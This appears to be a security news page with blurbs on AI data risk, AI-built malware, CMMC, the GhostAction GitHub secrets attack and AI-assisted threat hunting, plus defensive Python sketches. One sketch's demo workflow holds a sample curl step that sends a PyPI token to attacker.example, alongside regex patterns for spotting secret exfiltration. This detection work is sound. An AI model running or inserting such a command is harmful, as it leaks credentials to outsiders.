Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

The Hidden Risk in Enterprise AI, and the Smarter Way to Safeguard Data

AI exploded into the workplace overnight, reshaping how we work. Today, nearly every employee is experimenting with tools to move faster and think bigger. However, that acceleration comes with risk. According to Cyberhaven Labs’ latest research, nearly three-quarters of AI apps in use pose high or critical risks, and only 16% of enterprise data sent to AI ends up in enterprise-ready apps. The rest flows to personal or unvetted tools.

Adversarial AI and Polymorphic Malware: A New Era of Cyber Threats

The state of cybersecurity has always been in flux, but the arrival of tools like ChatGPT heralded one of the most significant challenges security teams have faced in years. AI can unlock enormous gains in data processing and malware detection, but in the wrong hands, Large Language Models (LLMs) and other adversarial AI tools can be used to develop polymorphic malware that escapes detection, gains access to sensitive data, and poisons data sets.

6 Best Practices for CMMC Physical Security Control

The first C in CMMC stands for cybersecurity, so it makes sense that the vast majority of content and information about it (both here and elsewhere online) focuses on the cyber aspect. Digital security makes up the bulk of the certification, and it's by far the biggest threat vector in a modern business space. There is, however, one detail that has to matter sooner or later: everything digital ultimately lives somewhere in physical space.

The GhostAction Supply Chain Attack: Compromised GitHub Workflows And Stolen Secrets

GitGuardian has uncovered GhostAction, a massive supply chain attack targeting 327 GitHub users and 817 repositories. Attackers injected malicious workflows that exfiltrated over 3,325 secrets, including npm, PyPI, and DockerHub tokens. Watch as GitGuardian's Senior Cybersecurity Researcher, Guillaume Valadon, breaks down how this campaign unfolded, what was stolen, and what developers need to know to stay safe.
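The attack pattern leaves a recognizable fingerprint: a workflow step that expands repository secrets and ships them to an outside endpoint in the same command. A minimal sketch of that idea (the regexes, function name, and demo workflow are illustrative assumptions, not GitGuardian's actual detection logic):

```python
import re

# Illustrative heuristics: a step that both expands a GitHub Actions secret
# and makes an outbound network call is worth a closer look.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.", re.IGNORECASE)
OUTBOUND = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b", re.IGNORECASE)

def flag_suspicious_steps(workflow_yaml: str) -> list[str]:
    """Return 'run' lines that reference secrets alongside a network call."""
    flagged = []
    for line in workflow_yaml.splitlines():
        if SECRET_REF.search(line) and OUTBOUND.search(line):
            flagged.append(line.strip())
    return flagged

# Hypothetical workflow snippet: one legitimate step, one exfiltration step.
demo = """
jobs:
  build:
    steps:
      - run: npm publish
      - run: curl -d "t=${{ secrets.PYPI_TOKEN }}" https://attacker.example/c
"""
print(flag_suspicious_steps(demo))
```

Real detection needs far more than line-level regexes (encoded payloads, multi-step staging, env indirection), but even this crude check would have tripped on the style of workflow injection described above.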

The WinINet.dll Red Flag Moment #cybersecurity #ai

Our recent webinar showed how our MCP server enables AI to apply the same technical analysis that expert threat hunters use by providing structured API access to security data and tools. In the demo, Claude identified WinINet.dll loaded in a suspicious process, a discovery that Eric Capuano, founder of Digital Defense Institute, called "a pretty smart move." This moment highlighted how AI can move beyond basic data collection to understand investigative context and connect technical findings to broader threat hypotheses.
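Why WinINet.dll is a red flag: it is the Windows HTTP client library that browsers and legitimate updaters load routinely, so the signal is the process context, not the DLL itself. A minimal sketch of that triage heuristic (the allowlist, process names, and function name are illustrative assumptions, not our MCP server's implementation):

```python
# Processes where loading WinINet.dll is expected (illustrative allowlist).
EXPECTED_LOADERS = {"iexplore.exe", "msedge.exe", "explorer.exe"}

def wininet_red_flags(process_modules: dict[str, list[str]]) -> list[str]:
    """Given {process_name: [loaded module names]}, return processes that
    load WinINet.dll but are not expected to speak HTTP. Malware often
    loads the library to blend command-and-control traffic into normal
    web requests."""
    flags = []
    for proc, modules in process_modules.items():
        loads_wininet = any(m.lower() == "wininet.dll" for m in modules)
        if loads_wininet and proc.lower() not in EXPECTED_LOADERS:
            flags.append(proc)
    return flags

# Hypothetical module snapshot, as an EDR or memory-analysis tool might report.
snapshot = {
    "msedge.exe": ["ntdll.dll", "wininet.dll"],           # expected loader
    "invoice_viewer.exe": ["ntdll.dll", "WinINet.dll"],   # suspicious loader
}
print(wininet_red_flags(snapshot))  # prints ['invoice_viewer.exe']
```

The interesting part of the demo was that the AI applied this kind of contextual reasoning on its own, connecting the module load to a broader hypothesis rather than just listing raw data.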